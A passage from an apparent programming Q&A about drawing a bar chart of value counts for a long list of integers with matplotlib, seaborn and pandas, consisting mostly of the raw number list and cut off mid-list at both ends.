251, 320, 314, 408, 180, 956, 776, 823, 645, 585, 373, 338, 666, 354, 537, 462, 865, 303, 1098, 602, 501, 714, 766, 348, 534, 446, 534, 1176, 1158, 412, 989, 360, 2165, 971, 993, 240, 606, 1554, 216, 387, 749, 384, 467, 654, 685, 954, 608, 299, 2270, 1178, 460, 548, 753, 399, 310, 837, 709, 259, 456, 351, 299, 950, 759, 178, 1072, 824, 198, 354, 608, 484, 717, 154, 598, 300, 303, 252, 565, 526, 381, 520, 384, 339, 461, 353, 391, 438, 450, 474, 228, 477, 623, 1196, 269, 341, 559, 468, 492, 528, 254, 1341, 545, 1276, 483, 794, 990, 742, 258, 341, 521, 714, 1234, 437, 1169, 660, 409, 873, 317, 1230, 1029, 1243, 390, 463, 335, 405, 1166, 357, 495, 530, 732, 330, 1368, 330, 330, 1368, 331, 930, 903, 801, 901, 1443, 324, 1444, 1443, 905, 324, 927, 2911, 468, 295, 370, 744, 235, 453, 355, 809, 1494, 168, 480, 494, 1102, 374, 480, 262, 563, 1844, 893, 180, 445, 588, 662, 746, 1482, 1054, 4866, 1377, 560, 726, 292, 377, 315, 1836, 782, 357, 1171, 190, 648, 715, 582, 1386, 540, 336, 482, 607, 361, 542, 357, 276, 1278, 593, 1019, 548, 1390, 552, 465, 372, 1283, 1281, 895, 751, 301, 261, 771, 428, 1206, 441, 1546, 285, 479, 902, 459, 603, 1187, 855, 856, 1444, 903, 930, 334, 856, 334, 856, 334, 1369, 331, 1368, 928, 324, 903, 494, 355, 450, 747, 410, 659, 477, 657, 2609, 477, 991, 930, 944, 464, 645, 476, 347, 849, 327, 445, 729, 486, 198, 369, 232, 396, 480, 269, 426, 351, 249, 803, 475, 228, 266, 844, 393, 516, 779, 483, 374, 561, 368, 374, 203, 494, 1443, 334, 856, 494, 1045, 894, 593, 590, 1086, 504, 928, 265, 312, 465, 408, 493, 265, 1625, 968, 1234, 348, 459, 1098, 318, 621, 549, 785, 1218, 585, 438, 1476, 230, 688, 584, 812, 423, 525, 459, 324, 981, 509, 323, 530, 466, 553, 462, 285, 1275, 402, 756, 1586, 588, 1004, 1170, 555, 426, 288, 605, 699, 1493, 621, 1746, 1023, 502, 375, 1028, 855, 581, 327, 162, 200, 201, 399, 435, 482, 690, 1173, 409, 836, 1526, 1020, 1088, 330, 315, 480, 593, 522, 444, 210, 739, 1900, 778, 847, 711, 219, 300, 303, 1109, 1283, 461, 860, 834, 778, 944, 282, 523, 593, 833, 564, 595, 534, 530, 582, 315, 1236, 1307, 939, 496, 667, 378, 1205, 174, 1331, 443, 479, 648, 857, 1285, 1071, 372, 1116, 577, 646, 645, 759, 1137, 819, 1577, 201, 374, 314, 736, 463, 1179, 491, 588, 953, 528, 392, 1367, 747, 344, 1762, 1048, 1070, 563, 474, 374, 327, 621, 596, 536, 260, 452, 576, 1476, 675, 824, 603, 511, 2064, 405, 548, 388, 1227, 368, 504, 1002, 327, 1544, 728, 906, 880, 405, 477, 585, 1141, 544, 530, 704, 1583, 1006, 422, 657, 1140, 482, 879, 750, 408, 951, 870, 488, 850, 537, 561, 555, 444, 822, 662, 333, 1993, 420, 406, 674, 644, 1392, 1031, 616, 815, 1180, 677, 861, 855, 251, 213, 375, 890, 200, 162, 1195, 1035, 388, 1224, 3684, 1002, 2398, 311, 355, 1626, 674, 626, 663, 646, 528, 1217, 348, 2272, 966, 658, 981, 511, 1121, 760, 312, 566, 961, 1659, 374, 480, 782, 1190, 324, 1140, 1254, 1513, 414, 1015, 1151, 786, 1122, 1642, 316, 476, 393, 1264, 530, 757, 716, 1019, 447, 279, 576, 681, 661, 1827, 267, 852, 738, 992, 1106, 1284, 234, 859, 692, 738, 1263, 473, 1122, 590, 307, 444, 529, 1217, 435, 1910, 1234, 1122, 473, 216, 678] CODE ###library import import matplotlib.pyplot as plt import seaborn as sns import pandas as pd import numpy as np ###first attempt sorted_len = sorted(l) sorted_counted = Counter(sorted_len) range_length = list(range(max(l))) data_series = {} for x in range_length: data_series[x] = 0 for key, value in sorted_counted.items(): data_series[key] = value data_series = pd.Series(data_series) x_values = data_series.index ###second attemmpt df = pd.DataFrame(l, columns=['len']) ###actual plots #x-axis is correct, but y-axis don't display colors... plt.bar(x_values, data_series.values) plt.show() #x-axis is correct, but y-axis don't display colors... val, cnt = np.unique(l, return_counts=True) sns.catplot(data=df, kind='count', x='len') #correct number of instances, but wrong x-axis... df.len.value_counts()[df.len.unique()].plot(kind='bar') R output P.S. to be noted I'm using PyCharm with the Invert image outputs for dark themes options so that the cell output for images is displayed on a white background for visibility | Here is the code with changes: import matplotlib.pyplot as plt import seaborn as sns import pandas as pd l = [408, 321, 522, 942, 462, 564, 765, 747, 465, 957, 993, 1056, 690, 1554, 1209, 246, 462, 3705, 1554, 507, 681, 1173, 408, 330, 1317, 240, 576, 2301, 1911, 1677, 1014, 756, 918, 864, 528, 882, 1131, 1440, 1167, 1146, 1002, 906, 1056, 1881, 396, 1278, 501, 1110, 303, 1176, 699, 747, 1971, 3318, 1875, 450, 354, 1218, 378, 303, 777, 915, 5481, 576, 1920, 2022, 1662, 519, 936, 423, 1149, 600, 1896, 648, 2238, 1419, 423, 552, 1299, 1071, 963, 471, 408, 729, 1896, 1068, 1254, 1179, 1188, 645, 978, 903, 1191, 1119, 747, 1005, 273, 1191, 519, 930, 1053, 2157, 933, 888, 591, 1287, 457, 294, 291, 669, 270, 556, 444, 483, 438, 452, 659, 372, 480, 464, 477, 256, 350, 357, 524, 477, 218, 192, 216, 587, 473, 525, 657, 241, 719, 383, 459, 855, 417, 283, 408, 678, 681, 1254, 879, 250, 857, 706, 456, 567, 190, 887, 287, 240, 960, 587, 361, 816, 297, 290, 253, 335, 609, 507, 294, 1475, 464, 780, 552, 555, 1605, 1127, 382, 579, 645, 273, 241, 552, 344, 890, 1346, 1067, 764, 431, 796, 569, 1386, 413, 401, 407, 252, 375, 378, 339, 457, 1779, 243, 701, 552, 708, 174, 300, 257, 378, 777, 729, 969, 603, 378, 436, 348, 399, 1662, 1511, 799, 715, 1400, 399, 516, 399, 355, 1291, 1286, 657, 374, 492, 334, 295, 210, 270, 858, 1487, 1020, 1641, 417, 396, 303, 553, 492, 1097, 612, 441, 654, 611, 532, 474, 864, 377, 465, 435, 1003, 608, 486, 748, 351, 245, 545, 627, 303, 457, 419, 449, 843, 312, 398, 704, 315, 330, 1054, 259, 507, 372, 468, 345, 1303, 408, 1031, 471, 653, 925, 397, 231, 684, 449, 336, 344, 619, 917, 417, 516, 359, 550, 222, 789, 608, 659, 853, 360, 657, 372, 305, 353, 650, 564, 547, 969, 505, 230, 953, 769, 307, 516, 408, 342, 267, 570, 572, 348, 1005, 981, 1586, 1302, 369, 1290, 1458, 572, 1122, 363, 879, 651, 466, 1203, 485, 440, 473, 810, 1320, 461, 455, 258, 660, 297, 285, 424, 273, 378, 432, 293, 410, 327, 483, 477, 551, 894, 638, 538, 678, 303, 478, 1046, 995, 360, 252, 480, 490, 475, 394, 1185, 357, 361, 387, 489, 450, 788, 366, 340, 829, 469, 404, 593, 498, 840, 601, 235, 452, 395, 504, 299, 662, 357, 686, 683, 248, 574, 1108, 587, 483, 1481, 1297, 1334, 579, 182, 456, 1335, 513, 967, 918, 607, 564, 727, 913, 743, 312, 480, 659, 939, 705, 1001, 553, 339, 286, 452, 744, 519, 521, 491, 565, 522, 377, 861, 812, 523, 332, 800, 1015, 1000, 513, 990, 1003, 733, 542, 940, 399, 399, 612, 1361, 399, 399, 318, 319, 510, 504, 841, 1529, 506, 1881, 500, 358, 240, 1261, 354, 519, 779, 656, 311, 635, 527, 759, 333, 648, 770, 330, 584, 453, 632, 513, 998, 343, 696, 1286, 391, 374, 893, 375, 426, 658, 455, 518, 466, 417, 614, 285, 480, 845, 344, 534, 572, 1727, 1085, 480, 468, 192, 348, 578, 2433, 390, 1031, 1129, 626, 735, 963, 439, 272, 806, 743, 560, 250, 679, 459, 207, 905, 616, 404, 489, 582, 340, 435, 1632, 417, 221, 279, 462, 357, 288, 248, 981, 1015, 935, 678, 279, 348, 470, 958, 867, 352, 735, 293, 911, 460, 767, 386, 531, 411, 192, 742, 373, 1454, 970, 285, 468, 273, 1527, 612, 983, 552, 998, 553, 812, 983, 403, 1706, 781, 183, 405, 891, 647, 1022, 946, 476, 270, 471, 888, 435, 354, 563, 526, 877, 1170, 351, 863, 1503, 562, 1174, 345, 385, 275, 374, 171, 474, 408, 1640, 345, 462, 722, 1645, 504, 840, 459, 783, 501, 473, 609, 684, 543, 353, 788, 684, 734, 242, 751, 478, 471, 365, 293, 380, 486, 617, 786, 436, 632, 624, 386, 925, 469, 405, 2406, 462, 435, 251, 1118, 349, 779, 343, 458, 264, 243, 935, 535, 576, 480, 406, 606, 495, 396, 456, 798, 404, 285, 375, 922, 1136, 330, 339, 559, 998, 239, 587, 468, 1237, 1722, 699, 436, 377, 306, 326, 1076, 385, 537, 315, 342, 386, 400, 340, 202, 266, 455, 435, 259, 317, 456, 249, 452, 1345, 699, 456, 456, 453, 275, 315, 693, 354, 475, 780, 415, 956, 554, 258, 418, 996, 552, 511, 1404, 469, 262, 398, 242, 350, 538, 379, 300, 460, 373, 276, 258, 740, 609, 753, 357, 495, 532, 551, 234, 633, 480, 312, 898, 350, 705, 265, 345, 334, 334, 582, 583, 582, 478, 465, 480, 408, 870, 624, 1107, 303, 384, 1165, 1456, 878, 297, 301, 276, 372, 551, 799, 496, 204, 552, 791, 330, 359, 480, 468, 414, 1102, 876, 1112, 850, 536, 500, 374, 825, 476, 499, 275, 345, 616, 360, 609, 310, 260, 376, 283, 390, 1529, 1310, 207, 1039, 661, 570, 1292, 914, 843, 658, 302, 1119, 609, 225, 317, 1091, 225, 403, 544, 495, 912, 744, 473, 985, 342, 630, 298, 392, 297, 933, 888, 666, 1023, 346, 310, 1134, 840, 1277, 387, 463, 435, 610, 492, 1107, 582, 582, 582, 1307, 647, 1280, 555, 645, 267, 952, 588, 348, 287, 507, 410, 737, 731, 354, 2192, 309, 388, 692, 389, 742, 766, 1228, 1640, 237, 495, 351, 285, 2443, 963, 296, 420, 482, 246, 553, 621, 405, 597, 459, 310, 300, 450, 471, 291, 610, 723, 380, 1439, 312, 900, 275, 396, 342, 309, 549, 355, 474, 417, 372, 384, 291, 987, 629, 407, 655, 357, 473, 348, 459, 599, 474, 430, 620, 584, 546, 435, 242, 1167, 627, 378, 945, 349, 255, 216, 530, 516, 606, 449, 1490, 401, 1070, 899, 452, 1304, 451, 723, 354, 229, 629, 639, 501, 465, 344, 1895, 288, 341, 2377, 542, 453, 291, 645, 494, 471, 612, 1294, 713, 1291, 467, 734, 300, 1432, 320, 753, 609, 1051, 231, 875, 704, 438, 742, 504, 1334, 738, 342, 435, 1133, 1229, 436, 310, 494, 273, 1228, 626, 470, 235, 1264, 465, 450, 350, 647, 541, 256, 231, 435, 485, 224, 555, 395, 300, 969, 237, 1717, 416, 538, 371, 326, 360, 1194, 397, 519, 645, 324, 465, 402, 477, 527, 831, 1179, 366, 889, 941, 374, 775, 581, 392, 1188, 797, 480, 418, 733, 857, 332, 255, 2847, 917, 478, 585, 591, 480, 1293, 273, 375, 489, 727, 316, 1451, 975, 762, 528, 408, 1104, 375, 265, 609, 317, 879, 542, 332, 462, 492, 284, 282, 394, 483, 493, 778, 291, 443, 350, 491, 374, 369, 862, 245, 269, 640, 282, 606, 393, 307, 488, 276, 611, 471, 1806, 1296, 336, 244, 1105, 444, 375, 1214, 294, 455, 353, 605, 669, 354, 692, 345, 643, 289, 460, 771, 351, 1635, 331, 465, 703, 352, 396, 269, 1142, 353, 552, 2790, 611, 606, 731, 447, 485, 420, 283, 744, 1265, 381, 1146, 589, 477, 309, 669, 389, 435, 558, 445, 1448, 333, 762, 1222, 779, 519, 465, 317, 375, 480, 371, 787, 305, 1276, 408, 304, 246, 791, 341, 330, 536, 278, 383, 417, 351, 323, 1068, 507, 741, 678, 613, 823, 1748, 411, 676, 287, 486, 433, 506, 194, 444, 860, 1212, 1005, 321, 462, 1158, 223, 625, 294, 294, 1598, 205, 764, 2649, 1226, 479, 543, 321, 1143, 648, 2409, 291, 1095, 651, 405, 294, 728, 267, 805, 294, 1010, 405, 368, 442, 363, 3117, 296, 466, 1621, 509, 219, 692, 453, 749, 828, 950, 683, 574, 438, 396, 461, 740, 350, 408, 1636, 746, 821, 912, 482, 532, 397, 582, 537, 761, 348, 354, 356, 978, 348, 441, 464, 1206, 576, 355, 446, 577, 1186, 396, 980, 213, 498, 597, 335, 419, 351, 617, 226, 609, 206, 762, 596, 999, 589, 585, 477, 558, 206, 806, 405, 356, 742, 881, 426, 434, 735, 494, 611, 308, 453, 426, 664, 384, 335, 612, 286, 463, 363, 460, 327, 1007, 1285, 1021, 464, 662, 1266, 1275, 205, 581, 351, 409, 387, 406, 296, 353, 447, 472, 667, 572, 682, 460, 941, 382, 477, 819, 340, 477, 716, 461, 302, 348, 291, 459, 567, 625, 216, 713, 394, 462, 620, 486, 1049, 1027, 761, 534, 348, 346, 313, 551, 522, 612, 303, 186, 288, 1054, 481, 1263, 530, 603, 491, 297, 1989, 598, 545, 291, 568, 201, 538, 267, 894, 2037, 456, 291, 367, 338, 782, 435, 570, 245, 371, 341, 478, 511, 348, 1019, 1315, 1007, 469, 711, 848, 1810, 807, 455, 607, 435, 270, 489, 408, 574, 444, 438, 495, 474, 675, 1024, 610, 464, 477, 549, 305, 366, 306, 222, 158, 893, 312, 348, 259, 261, 336, 495, 560, 452, 273, 357, 455, 195, 506, 1403, 345, 347, 462, 957, 224, 798, 487, 372, 798, 420, 316, 400, 399, 878, 618, 371, 369, 336, 474, 350, 1081, 1012, 649, 480, 430, 570, 341, 759, 456, 237, 466, 531, 455, 846, 280, 767, 758, 624, 724, 582, 1924, 270, 570, 1800, 530, 826, 1478, 345, 624, 498, 231, 686, 592, 1671, 413, 582, 302, 504, 666, 727, 613, 857, 270, 446, 483, 1781, 1308, 358, 1393, 453, 672, 264, 412, 281, 378, 476, 562, 792, 342, 495, 342, 392, 269, 1495, 668, 490, 272, 266, 270, 1080, 401, 405, 395, 588, 306, 604, 482, 301, 1439, 1605, 1833, 441, 1287, 1093, 1564, 1093, 624, 1925, 1287, 894, 428, 547, 1924, 1455, 938, 1369, 1794, 404, 605, 570, 447, 1171, 268, 626, 318, 406, 1471, 1069, 792, 657, 482, 420, 1121, 844, 522, 1560, 734, 1318, 723, 1335, 830, 825, 287, 440, 895, 323, 782, 479, 1397, 860, 297, 1002, 570, 603, 576, 269, 466, 758, 509, 552, 462, 493, 477, 431, 351, 757, 438, 1765, 1486, 480, 907, 620, 600, 438, 576, 576, 801, 515, 862, 337, 532, 385, 953, 719, 1223, 468, 486, 445, 231, 610, 474, 311, 738, 868, 453, 558, 409, 305, 827, 308, 614, 519, 380, 763, 472, 313, 447, 960, 741, 444, 520, 543, 531, 450, 413, 305, 492, 868, 207, 1285, 492, 802, 435, 303, 723, 705, 308, 417, 353, 347, 737, 380, 477, 343, 345, 409, 408, 276, 193, 270, 845, 792, 443, 1111, 256, 800, 549, 315, 274, 426, 470, 359, 473, 271, 576, 1293, 342, 761, 577, 671, 340, 276, 394, 467, 387, 336, 920, 350, 1400, 195, 336, 1282, 282, 773, 757, 566, 396, 880, 494, 661, 953, 480, 314, 468, 468, 339, 550, 1075, 334, 318, 365, 567, 286, 1560, 207, 1344, 584, 333, 387, 1164, 1074, 1324, 1080, 405, 264, 300, 582, 342, 427, 514, 576, 993, 208, 669, 993, 439, 219, 742, 890, 966, 520, 337, 488, 438, 561, 319, 476, 300, 465, 1056, 1044, 216, 198, 267, 327, 527, 746, 447, 288, 923, 268, 300, 262, 1015, 468, 289, 341, 345, 483, 482, 548, 255, 441, 229, 435, 453, 264, 369, 403, 333, 461, 446, 221, 405, 848, 616, 396, 405, 495, 476, 315, 351, 438, 495, 482, 456, 322, 666, 1031, 633, 306, 880, 2683, 774, 494, 993, 430, 1284, 1118, 1030, 219, 384, 2249, 301, 195, 689, 251, 302, 474, 732, 790, 435, 436, 270, 198, 435, 583, 800, 310, 576, 280, 363, 651, 743, 855, 485, 673, 1014, 345, 407, 351, 3668, 355, 396, 415, 361, 229, 269, 1094, 435, 327, 587, 299, 362, 375, 414, 440, 637, 732, 845, 432, 360, 572, 198, 934, 1480, 948, 976, 899, 372, 459, 997, 165, 734, 455, 479, 480, 514, 504, 446, 504, 1620, 552, 1118, 485, 509, 892, 1025, 546, 777, 455, 445, 985, 474, 864, 302, 712, 283, 307, 432, 1075, 478, 732, 685, 375, 507, 1209, 1097, 2480, 477, 343, 432, 496, 465, 457, 768, 561, 660, 915, 661, 255, 217, 960, 265, 526, 672, 798, 357, 1692, 622, 465, 612, 228, 1086, 444, 261, 345, 238, 706, 240, 444, 288, 632, 528, 318, 401, 378, 192, 461, 528, 393, 486, 409, 831, 1019, 745, 222, 216, 465, 839, 1399, 523, 461, 457, 388, 438, 1062, 351, 553, 814, 345, 494, 643, 307, 306, 252, 569, 534, 557, 372, 374, 344, 696, 351, 582, 903, 375, 432, 303, 743, 617, 459, 492, 495, 999, 284, 538, 291, 748, 742, 739, 449, 212, 261, 579, 1311, 1178, 330, 458, 276, 563, 467, 565, 578, 227, 178, 959, 642, 475, 1242, 325, 365, 360, 314, 523, 201, 569, 571, 351, 319, 298, 468, 1154, 351, 599, 574, 947, 480, 415, 770, 459, 263, 285, 281, 465, 1429, 498, 199, 345, 639, 261, 489, 314, 291, 692, 318, 351, 399, 275, 540, 542, 914, 492, 872, 231, 1324, 373, 270, 302, 479, 285, 381, 270, 410, 1366, 242, 698, 1044, 513, 1004, 951, 702, 796, 291, 282, 444, 734, 1669, 500, 350, 319, 1092, 239, 434, 266, 297, 323, 407, 252, 879, 893, 267, 222, 326, 311, 288, 680, 568, 477, 877, 408, 968, 888, 1497, 1312, 336, 279, 459, 876, 294, 324, 324, 801, 383, 225, 449, 609, 384, 738, 951, 312, 550, 810, 765, 377, 297, 179, 213, 320, 489, 797, 1637, 558, 616, 1907, 517, 556, 773, 669, 426, 432, 956, 336, 757, 353, 420, 462, 797, 475, 1124, 356, 579, 212, 472, 361, 408, 390, 470, 527, 637, 422, 474, 622, 533, 728, 985, 537, 606, 340, 754, 479, 851, 960, 453, 607, 518, 639, 495, 341, 411, 441, 609, 792, 287, 498, 458, 260, 195, 411, 1646, 375, 665, 243, 356, 426, 207, 362, 452, 339, 666, 852, 476, 312, 375, 284, 437, 673, 507, 332, 380, 747, 734, 431, 268, 243, 315, 221, 767, 894, 225, 362, 358, 919, 294, 396, 449, 179, 549, 435, 528, 479, 300, 436, 380, 523, 550, 255, 1043, 645, 402, 203, 479, 679, 478, 654, 769, 471, 418, 617, 342, 674, 993, 321, 615, 150, 204, 1033, 606, 759, 604, 828, 307, 273, 558, 234, 408, 548, 1238, 914, 978, 930, 269, 287, 390, 474, 248, 234, 714, 603, 471, 236, 383, 732, 356, 269, 461, 358, 197, 506, 465, 274, 618, 1309, 1638, 1154, 2222, 930, 1395, 1387, 765, 899, 291, 354, 872, 355, 273, 664, 426, 360, 683, 627, 609, 1230, 861, 6609, 549, 444, 240, 461, 234, 495, 571, 957, 342, 212, 1519, 396, 358, 1272, 1492, 615, 414, 472, 332, 335, 1060, 721, 477, 556, 654, 699, 654, 393, 921, 1651, 504, 710, 1083, 755, 246, 476, 270, 330, 618, 805, 571, 495, 391, 498, 1390, 444, 207, 615, 349, 548, 467, 301, 216, 473, 724, 744, 504, 673, 525, 670, 669, 1221, 288, 884, 462, 565, 434, 522, 455, 639, 1221, 301, 1223, 1029, 991, 491, 465, 434, 472, 392, 821, 719, 543, 246, 818, 913, 402, 535, 492, 492, 491, 534, 968, 886, 316, 541, 494, 409, 246, 435, 442, 989, 473, 790, 624, 398, 469, 273, 735, 328, 601, 627, 356, 344, 410, 1261, 495, 506, 518, 388, 624, 687, 237, 972, 476, 527, 1518, 479, 633, 675, 374, 573, 444, 357, 239, 581, 799, 308, 522, 758, 272, 171, 276, 879, 275, 455, 648, 252, 474, 303, 510, 348, 590, 1086, 504, 928, 530, 495, 1587, 239, 608, 326, 585, 373, 496, 482, 1158, 885, 333, 459, 370, 455, 893, 307, 468, 290, 604, 1198, 306, 1110, 922, 705, 418, 1441, 613, 401, 546, 354, 465, 1205, 328, 703, 570, 428, 232, 1292, 415, 1007, 1285, 1019, 968, 245, 606, 1284, 798, 1588, 1547, 606, 326, 506, 228, 1071, 429, 485, 1508, 625, 294, 330, 405, 343, 192, 452, 359, 222, 1282, 521, 461, 403, 735, 297, 1288, 606, 382, 339, 650, 918, 309, 724, 479, 439, 289, 364, 1683, 226, 1139, 372, 495, 741, 923, 464, 629, 266, 1186, 891, 429, 271, 224, 723, 408, 687, 763, 421, 398, 599, 918, 272, 610, 932, 247, 306, 1224, 594, 531, 349, 332, 405, 486, 406, 752, 441, 386, 368, 663, 350, 480, 1067, 368, 816, 468, 615, 976, 339, 332, 903, 357, 961, 970, 657, 942, 662, 400, 304, 858, 332, 238, 231, 327, 475, 1499, 432, 585, 392, 412, 594, 263, 381, 432, 1320, 269, 439, 465, 321, 718, 1059, 408, 1308, 392, 856, 1255, 536, 339, 2192, 455, 1390, 715, 522, 980, 432, 320, 2766, 531, 697, 378, 717, 246, 590, 731, 976, 733, 177, 345, 588, 348, 1187, 318, 724, 705, 1146, 284, 610, 354, 298, 331, 693, 1210, 1470, 540, 612, 419, 1039, 574, 739, 1213, 1332, 296, 292, 493, 1046, 567, 662, 708, 233, 1123, 933, 624, 159, 492, 210, 473, 1153, 1489, 974, 669, 1281, 737, 729, 545, 532, 357, 565, 844, 939, 468, 878, 772, 773, 355, 469, 2315, 171, 654, 1063, 432, 1938, 270, 866, 716, 1022, 323, 330, 226, 285, 300, 896, 300, 659, 246, 1493, 231, 906, 294, 465, 533, 525, 363, 524, 891, 788, 270, 240, 723, 734, 2027, 474, 1327, 547, 589, 240, 465, 339, 614, 492, 486, 398, 639, 345, 974, 156, 664, 1544, 1367, 776, 610, 465, 519, 478, 1524, 640, 1431, 1288, 419, 189, 275, 651, 852, 939, 672, 316, 489, 456, 360, 921, 939, 446, 366, 384, 366, 266, 332, 492, 1479, 825, 460, 351, 549, 475, 740, 313, 357, 556, 618, 1039, 411, 234, 378, 567, 269, 990, 270, 573, 629, 996, 1107, 393, 480, 624, 583, 485, 1770, 323, 374, 484, 1128, 609, 379, 1426, 551, 1182, 680, 607, 472, 467, 1312, 468, 342, 473, 1279, 832, 408, 802, 764, 290, 668, 440, 1085, 492, 1523, 189, 329, 1334, 403, 285, 427, 653, 346, 1385, 197, 1281, 465, 468, 414, 981, 473, 879, 552, 246, 522, 610, 609, 255, 915, 2142, 624, 236, 892, 480, 944, 847, 674, 739, 275, 1139, 291, 815, 357, 387, 613, 160, 341, 630, 794, 3061, 552, 167, 447, 300, 471, 1182, 867, 424, 1104, 417, 648, 708, 700, 405, 399, 231, 246, 1588, 766, 1127, 611, 892, 604, 995, 657, 2170, 336, 492, 273, 874, 303, 487, 500, 967, 1380, 345, 300, 1863, 408, 446, 1269, 351, 1448, 570, 336, 487, 270, 270, 804, 833, 1384, 1235, 404, 285, 1499, 708, 834, 584, 309, 492, 528, 762, 624, 380, 323, 916, 403, 384, 409, 530, 241, 724, 1950, 645, 301, 386, 704, 708, 1389, 588, 693, 484, 469, 299, 467, 1119, 696, 610, 824, 231, 531, 321, 663, 177, 635, 573, 268, 711, 892, 513, 707, 872, 619, 576, 476, 506, 285, 594, 495, 564, 399, 387, 638, 536, 594, 772, 955, 672, 312, 305, 627, 774, 575, 1178, 1647, 390, 879, 563, 931, 464, 440, 515, 201, 499, 703, 738, 1372, 794, 712, 503, 1034, 618, 753, 225, 736, 688, 395, 345, 531, 695, 467, 1009, 789, 1659, 532, 913, 261, 359, 611, 660, 480, 555, 551, 849, 743, 1224, 841, 442, 408, 372, 625, 437, 825, 297, 375, 647, 304, 992, 722, 451, 684, 155, 780, 543, 340, 477, 1659, 2790, 480, 445, 457, 968, 360, 306, 676, 498, 603, 318, 724, 600, 265, 718, 381, 343, 776, 600, 600, 600, 600, 600, 600, 600, 597, 600, 597, 584, 255, 1539, 672, 1726, 179, 589, 326, 629, 626, 789, 440, 954, 537, 262, 3015, 405, 374, 381, 743, 272, 479, 640, 293, 359, 412, 959, 550, 1088, 492, 615, 279, 480, 864, 369, 491, 467, 343, 537, 723, 254, 567, 1049, 1313, 591, 311, 477, 1617, 744, 251, 299, 159, 461, 464, 1042, 668, 301, 771, 533, 280, 713, 544, 608, 493, 644, 344, 456, 560, 1110, 307, 290, 1069, 606, 717, 1167, 653, 356, 495, 1012, 432, 297, 1618, 405, 449, 405, 573, 565, 962, 364, 369, 910, 223, 245, 398, 495, 577, 616, 468, 620, 316, 230, 633, 334, 808, 543, 744, 935, 1004, 863, 615, 592, 429, 333, 204, 484, 287, 642, 930, 866, 997, 299, 290, 520, 342, 959, 588, 851, 629, 522, 537, 569, 336, 391, 462, 824, 474, 959, 760, 353, 348, 462, 1420, 1386, 1275, 548, 408, 600, 600, 600, 600, 402, 242, 1391, 1215, 573, 470, 1168, 476, 1712, 376, 868, 495, 379, 300, 1359, 1053, 662, 465, 526, 427, 543, 667, 322, 778, 1327, 435, 360, 507, 1079, 1201, 477, 403, 261, 673, 499, 580, 446, 908, 1490, 552, 269, 576, 616, 933, 961, 384, 236, 479, 255, 495, 483, 602, 354, 435, 650, 826, 455, 704, 246, 636, 1267, 1201, 282, 567, 432, 2289, 666, 549, 162, 510, 748, 297, 372, 270, 699, 227, 412, 344, 470, 491, 1370, 403, 456, 246, 317, 335, 1379, 952, 456, 416, 519, 312, 656, 338, 863, 688, 340, 854, 666, 697, 742, 967, 587, 192, 462, 490, 337, 890, 1539, 244, 229, 536, 280, 264, 414, 438, 1311, 300, 884, 695, 1509, 798, 612, 611, 414, 533, 678, 426, 274, 466, 883, 864, 603, 873, 1398, 477, 495, 528, 767, 613, 304, 1419, 832, 488, 489, 1290, 648, 266, 1200, 957, 407, 507, 703, 715, 495, 305, 389, 949, 492, 1155, 693, 333, 464, 331, 769, 660, 1115, 403, 483, 899, 279, 371, 354, 361, 444, 552, 286, 248, 265, 662, 393, 2433, 766, 752, 326, 692, 1185, 1170, 678, 728, 432, 656, 1190, 510, 878, 366, 434, 297, 680, 735, 533, 935, 774, 692, 1162, 687, 540, 1417, 464, 339, 779, 471, 566, 281, 384, 271, 760, 698, 357, 513, 888, 475, 515, 216, 864, 303, 630, 425, 299, 562, 522, 1155, 457, 489, 812, 719, 405, 1313, 735, 255, 275, 384, 274, 1007, 289, 457, 1239, 368, 1148, 581, 351, 488, 712, 1097, 639, 478, 481, 630, 479, 493, 740, 1239, 366, 380, 1234, 358, 483, 824, 593, 994, 318, 465, 797, 715, 766, 333, 615, 693, 495, 366, 366, 420, 400, 381, 879, 431, 404, 645, 405, 451, 360, 263, 522, 315, 294, 610, 382, 1304, 417, 655, 824, 829, 463, 798, 453, 495, 264, 1122, 1476, 469, 285, 1098, 838, 430, 293, 418, 225, 260, 1004, 346, 552, 1383, 708, 1218, 348, 738, 358, 342, 303, 993, 597, 1048, 571, 448, 752, 581, 475, 803, 1209, 863, 385, 737, 435, 651, 982, 1286, 1175, 1172, 329, 582, 485, 1280, 338, 520, 308, 407, 330, 392, 420, 1595, 951, 454, 348, 482, 305, 1004, 498, 243, 768, 470, 1773, 770, 266, 543, 456, 622, 516, 773, 661, 368, 395, 364, 444, 506, 606, 1077, 429, 557, 478, 311, 1318, 2398, 724, 402, 435, 345, 511, 1004, 1119, 293, 365, 715, 360, 191, 955, 480, 954, 347, 421, 495, 416, 432, 457, 583, 484, 894, 918, 705, 471, 378, 499, 889, 1277, 624, 307, 1274, 405, 299, 430, 1449, 879, 374, 1078, 1326, 860, 586, 192, 1356, 815, 595, 817, 484, 476, 373, 416, 744, 526, 352, 207, 460, 542, 334, 332, 499, 702, 258, 951, 771, 1199, 372, 425, 459, 448, 542, 343, 270, 791, 969, 287, 316, 398, 460, 357, 270, 811, 741, 474, 374, 582, 869, 404, 409, 421, 581, 797, 1197, 225, 408, 366, 338, 1098, 474, 609, 1318, 568, 864, 813, 1560, 543, 312, 321, 305, 1125, 420, 771, 400, 302, 251, 476, 321, 1140, 405, 764, 390, 275, 317, 697, 447, 573, 348, 1829, 1062, 459, 361, 861, 1385, 1797, 1182, 477, 445, 552, 537, 359, 684, 1079, 342, 260, 519, 408, 827, 823, 456, 529, 1155, 291, 900, 730, 445, 564, 399, 1149, 488, 192, 658, 1520, 1024, 861, 1007, 455, 808, 750, 489, 411, 486, 382, 566, 354, 366, 542, 542, 413, 1056, 1056, 486, 793, 431, 790, 416, 610, 504, 491, 1393, 611, 392, 531, 588, 905, 820, 955, 1148, 782, 1104, 314, 744, 729, 428, 256, 680, 337, 372, 622, 289, 367, 676, 327, 465, 1311, 1101, 370, 401, 729, 302, 587, 378, 420, 1124, 450, 1387, 387, 240, 1232, 352, 589, 669, 1181, 405, 656, 1185, 946, 610, 1696, 610, 294, 537, 381, 646, 393, 325, 274, 300, 449, 669, 342, 551, 1329, 473, 398, 1222, 881, 651, 234, 467, 682, 457, 905, 292, 330, 726, 291, 312, 438, 393, 477, 1494, 188, 369, 491, 394, 539, 674, 569, 531, 342, 770, 347, 279, 510, 360, 346, 959, 661, 315, 406, 813, 527, 517, 568, 373, 417, 429, 330, 572, 638, 210, 266, 894, 746, 344, 459, 772, 261, 339, 876, 575, 317, 1534, 707, 1141, 405, 1104, 282, 954, 441, 573, 656, 255, 444, 610, 1696, 207, 610, 610, 648, 548, 948, 641, 344, 505, 397, 388, 1859, 488, 251, 320, 314, 408, 180, 956, 776, 823, 645, 585, 373, 338, 666, 354, 537, 462, 865, 303, 1098, 602, 501, 714, 766, 